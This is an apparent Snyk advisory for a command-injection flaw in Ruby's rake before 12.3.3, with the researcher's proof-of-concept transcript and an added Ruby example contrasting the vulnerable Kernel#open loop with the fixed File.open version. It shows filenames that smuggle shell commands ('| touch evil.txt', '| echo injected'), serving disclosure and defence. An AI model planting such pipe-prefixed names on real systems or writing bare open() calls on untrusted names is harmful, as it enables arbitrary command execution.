Arbitrary Code Injection Affecting rake package, versions <12.3.3

Severity: high (Snyk CVSS)
  Attack Complexity: Low
  Threat Intelligence
    Exploit Maturity: Proof of concept
    EPSS: 0.09% (36th percentile)
NVD: 6.4 medium
SUSE: 5 medium
Red Hat: 6.4 medium

  • Snyk ID SNYK-RUBY-RAKE-552000
  • published 24 Feb 2020
  • disclosed 24 Feb 2020
  • credit Katsuhiko Yoshida

How to fix?

Upgrade rake to version 12.3.3 or higher.

Overview

rake is a Make-like program implemented in Ruby.

Affected versions of this package are vulnerable to Arbitrary Code Injection (OS command injection) in Rake::FileList. The egrep method opens each entry of the list with Ruby's Kernel#open, and Kernel#open treats a string that begins with the pipe character | as a command to spawn rather than a file to read. A file whose name begins with | (for example one dropped into a directory that a Rakefile globs into a FileList) therefore causes the remainder of the name to be executed as a shell command when egrep runs, with the command's output being what egrep searches. Rake 12.3.3 fixes this by opening entries with File.open, which never interprets the name.

PoC by Katsuhiko Yoshida. The working directory contains a file literally named "| touch evil.txt"; poc_rake.rb builds a Rake::FileList over the directory and calls egrep on it (line 6 of the script matches the /something/ pattern and is printed). After the run, evil.txt exists because the pipe-prefixed entry was executed as a command instead of being read:

% ls -1
Gemfile
Gemfile.lock
poc_rake.rb
vendor
| touch evil.txt
% bundle exec ruby poc_rake.rb
["poc_rake.rb", "Gemfile", "Gemfile.lock", "| touch evil.txt", "vendor"]
poc_rake.rb:6:list.egrep(/something/)
Error while processing 'vendor': Is a directory @ io_fillbuf - fd:7 vendor
% ls -1
Gemfile
Gemfile.lock
evil.txt
poc_rake.rb
vendor
| touch evil.txt
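The following is an added example, not rake's own code or the researcher's PoC, showing the mechanism behind the transcript above: the same grep loop written once with Kernel#open (the pre-12.3.3 shape, which runs a "|"-prefixed entry as a command) and once with File.open (the 12.3.3 shape, which treats it as a plain path), plus a guard that strips such names from a list before any open call. The filename "| echo injected" and the temp-file contents are constructed for the demonstration; the command it spawns is harmless.

```ruby
# Added example (not rake's own code): why a "|"-prefixed list entry led to
# command execution in Rake::FileList#egrep before 12.3.3, and the fixed shape.
require "tempfile"

# Constructed filename (assumption, not from the advisory): its first character
# is "|", which Kernel#open reads as "run the rest as a command, give me stdout".
PIPE_NAME = "| echo injected".freeze

# Vulnerable shape: the pre-12.3.3 egrep opened each list entry with
# Kernel#open, so an entry starting with "|" spawns a subprocess and the
# "file contents" that get grepped are the command's output.
def grep_with_kernel_open(fn, pattern)
  hits = []
  open(fn, "r") do |io|                        # Kernel#open: "|cmd" => IO.popen
    io.each_line.with_index(1) do |line, n|
      hits << [fn, n, line.chomp] if pattern.match?(line)
    end
  end
  hits
end

# Fixed shape (what 12.3.3 does): File.open never interprets the name, so
# "| echo injected" is simply a path that does not exist (Errno::ENOENT).
def grep_with_file_open(fn, pattern)
  hits = []
  File.open(fn, "r") do |io|
    io.each_line.with_index(1) do |line, n|
      hits << [fn, n, line.chomp] if pattern.match?(line)
    end
  end
  hits
end

# Defence in depth for code that still has to go through an API accepting
# both paths and commands: refuse names Kernel#open would treat as a pipe
# before they ever reach the call.
def pipe_name?(fn)
  fn.start_with?("|")
end

def reject_pipe_names(names)
  names.reject { |fn| pipe_name?(fn) }
end

if __FILE__ == $0
  tmp = Tempfile.new("poc")
  tmp.write("first line\nsomething here\n")   # constructed sample file
  tmp.flush
  p grep_with_file_open(tmp.path, /something/)  # [[path, 2, "something here"]]
  p grep_with_kernel_open(PIPE_NAME, /injected/) # command ran: [["| echo injected", 1, "injected"]]
  begin
    grep_with_file_open(PIPE_NAME, /injected/)
  rescue Errno::ENOENT => e
    puts "File.open treated the name as a path: #{e.class}"
  end
  p reject_pipe_names(["Gemfile", PIPE_NAME, "vendor"]) # ["Gemfile", "vendor"]
  tmp.close!
end
```

The difference is entirely in which open is called: Kernel#open dispatches on the first character of its argument, File.open does not. When auditing Ruby code that passes user- or filesystem-derived names to open, look for bare `open(` (and `URI.open`/`IO.popen` with untrusted strings) and replace it with `File.open` unless a pipe is genuinely intended.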